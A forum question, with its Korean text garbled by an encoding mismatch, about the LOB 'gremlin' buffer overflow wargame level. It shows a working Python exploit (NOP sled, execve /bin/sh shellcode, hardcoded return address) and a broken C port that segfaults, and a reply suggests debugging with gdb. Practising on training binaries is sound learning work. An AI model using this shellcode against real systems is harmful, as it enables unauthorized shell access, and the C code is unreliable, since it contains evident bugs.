½Ã½ºÅÛ ÇØÅ·

 1576, 1/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ÇØÅ·ÀßÇÏ°í½Í´Ù
   http://¾øÀ½
   LOB ¹®Á¦ ÀͽºÇ÷ÎÀÕÀ» C·Î ÀÛ¼ºÇϸ鼭 Ǫ´Âµ¥¿ä.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=2014 [º¹»ç]


import os

# Ÿ°Ù ÆÄÀÏ °æ·Î
TARGET = os.getcwd() + "/gremlin"

# NOP ½½¶óÀ̵å
payload = "\x90" * 200

# ½©ÄÚµå Ãß°¡
SHELLCODE = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
payload = payload + SHELLCODE

# Ãß°¡ NOP ½½¶óÀ̵å
payload = payload + "\x90" * 35

# ¸®ÅÏ ÁÖ¼Ò Ãß°¡ (½Ã½ºÅÛ¿¡ ¸Â°Ô ¼öÁ¤ ÇÊ¿ä)
RET_ADDR = "\x60\xfd\xff\xbf"
payload = payload + RET_ADDR

# execv È£Ãâ
os.execv(TARGET, (TARGET, payload))






ÆÄÀ̽ã 1.5.2ÀÇ ±âÁØÀ¸·Î ÀͽºÇ÷ÎÀÕ Äڵ带 ÀÛ¼ºÇÏ´Â °Ç Çß½À´Ï´Ù.
±×·±µ¥ C·Î ÀÛ¼ºÇÏ´Ï ¼¼±×¸àÅ×ÀÌ¼Ç ¿À·ù(core dumped)°¡ ¶å´Ï´Ù.
¾Æ·¡´Â Á¦°¡ C·Î ÀÛ¼ºÇÑ ÄÚµåÀä.





[gate@localhost gate]$ cat exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main() {
    char *target = "/home/gate/gremlin";
    char payload[300];
    char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
    char ret_addr[] = "\x60\xfd\xff\xbf";
    char *c_argv[1024];


    memset(payload, 0x90, 200);  // NOP ½½¶óÀ̵å (0x90)
    memcpy(payload + 200, shellcode, sizeof(shellcode) - 1);  // ½©Äڵ带 NOP ½½¶óÀÌµå µÚ¿¡ Ãß°¡
    memset(payload + 200 + sizeof(shellcode) - 1, 0x90, 35);  // Ãß°¡ NOP ½½¶óÀ̵å
    memcpy(payload + 200 + sizeof(shellcode) - 1 + 35, ret_addr, 4);

    strcpy(c_argv[0], target);
    strcpy(payload, target);
    c_argv[2] = NULL;

    execv(target, c_argv);

    return 0;
}

[gate@localhost gate]$ gcc -o exploit exploit.c
[gate@localhost gate]$ ./exploit
Segmentation fault (core dumped)
[gate@localhost gate]$




¾îµð°¡ ¹®Á¦ÀÎÁö ¾Ë·ÁÁÖ½Ã¸é °¨»çÇÏ°Ú½À´Ï´Ù...
  Hit : 1381     Date : 2024/09/18 04:15


    
ÇØÅ·ÀßÇÏ°í½Í´Ù ¿¾³¯¿¡ LOB 15´Ü°è Á¤µµ±îÁö Ç®´Ù°¡ ´Ù½Ã ½ÃÀÛÇϴµ¥ Æäµµ¶ó±îÁö ³¡±îÁö Ç®·Á±¸¿ä ¤»¤»
ÆÄÀ̽ãÀ¸·Î ½±°Ô ÇÒ ¼ö Àִµ¥ C°¡ ¾ÆÁ÷µµ Á» ¾î·Æ³×¿ä ¤»¤»		 2024/09/18  
gihacker ¼¼±×¸àÅ×ÀÌ¼Ç ÆúÆ® ¶á°Å º¸¸é ¿¢¼¼½º ÇÒ¼ö¾ø´Â ÁÖ¼Ò¸¦ »ç¿ëÇÑ°Í°°Àº´ë gdb ·Î ºê·¹ÀÌÅ© °É¾î°¡¸é¼­ ãÀ¸½Ã¸é µÉ°Í°°¾Æ¿ä ¿¹»óÀ¸·Î´Â ½½¶óÀÌµå °è»êÀÌ ¿À·ù°¡ ÀÖ³ªº¸³»¿ä 2024/09/18  
1576   ¹ö±×¹Ù¿îƼ¸¦ ÇÒ Á¤µµÀÇ ¼öÁØÀÌ¸é ¾î¶»°Ô ·Îµå¸ÊÀ» Àâ¾Æ¾ß Çϳª¿ä?     ÇØÅ·ÀßÇÏ°í½Í´Ù
 05/03 1033
  LOB ¹®Á¦ ÀͽºÇ÷ÎÀÕÀ» C·Î ÀÛ¼ºÇϸ鼭 Ǫ´Âµ¥¿ä.[2]     ÇØÅ·ÀßÇÏ°í½Í´Ù
 09/18 1380
1574   pwnable.kr echo1 Áú¹®2 (½ºÆ÷ ÁÖÀÇ)[2]     turttle2s
 10/05 2486
1573   LOB GATE¹®Á¦ Ç®¸é¼­ ±Ã±ÝÇÑÁ¡[3]     hackxx123
 08/24 2129
1572   libc°ü·Ã - 2[5]     lMaxl04
 08/24 2089
1571   ASLRÀÌ °É·ÁÀÖÀ»¶§ ret¿¡ ROPÀ¸·Î jmp %espÀ» »ç¿ëÇÑ °æ¿ì.[3]     lMaxl04
 06/29 2301
1570   ¸®¸ðÆ® ȯ°æ¿¡¼­ÀÇ ½ºÅà ÁÖ¼Ò È®ÀÎ ¹æ¹ýÀÌ ±Ã±ÝÇÕ´Ï´Ù.[2]     lMaxl04
 06/16 1924
1569   ÇØÅ· ÇÁ¸®¼­¹ö ¾ø¾îÁ³³ª¿ä?[1]     terfkim
 04/15 2811
1568   ½ºÅÿ¡ µ¥ÀÌÅÍ ³ÖÀ» ¶§ SIGSEGV[4]     turttle2s
 02/04 2501
1567   pwnable.kr echo1 Áú¹®[2]     turttle2s
 06/17 2791
1566   ROP strcpy °ü·Ã Áú¹®ÀÔ´Ï´Ù.[3]     heeyoung0511
 06/16 2486
1565   Level2 -> Level3 ¿¡¼­ vi¿Í /usr/bin/EditorÀÇ Â÷ÀÌ[2]     hyemin1826
 07/18 2901
1564   Trainer3 ftz.hackerschool.org È£½ºÆ® Á¢¼Ó ºÒ°¡[1]     hyemin1826
 07/18 4662
1563   dllÀÎÁ§¼Ç ½ÇÇèÁß Áú¹® µå¸³´Ï´Ù.[1]     kkk477
 05/31 2863
1562   ÆÐŶ º¹È£È­¸¦ ¸¶½ºÅÍ ÇÏ·Á¸é ¾î¶² °úÁ¤ÀÌ ÀÖ¾î¾ßÇϳª¿ä?     sa0814
 04/01 2450
1561   »ç±â[2]     jas08
 03/31 2781
1560   ½Ã½ºÅÛ ÄÝÀÌ °¡´ÉÇÑ ¸Þ¸ð¸® ¿µ¿ª°ú ºÒ°¡´ÉÇÑ ¸Þ¸ð¸® ¿µ¿ªÀÌ Á¸ÀçÇϳª¿ä?     ocal
 03/30 2461
1559   pwntools »ç¿ë½Ã¿Í ±âº» socket ¸ðµâ ÀÌ¿ë½Ã Â÷ÀÌ?[4]     ocal
 01/09 3333
1558   lob level19(nightmare) °ü·ÃÁú¹®[1]     dnjsdnwja
 12/18 2473
1557   ftz level2 Áú¹®ÀÖ½À´Ï´Ù[1]     kihyun1998
 12/13 2660
1 [2][3][4][5][6][7][8][9][10]..[79]

Copyright 1999-2026 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org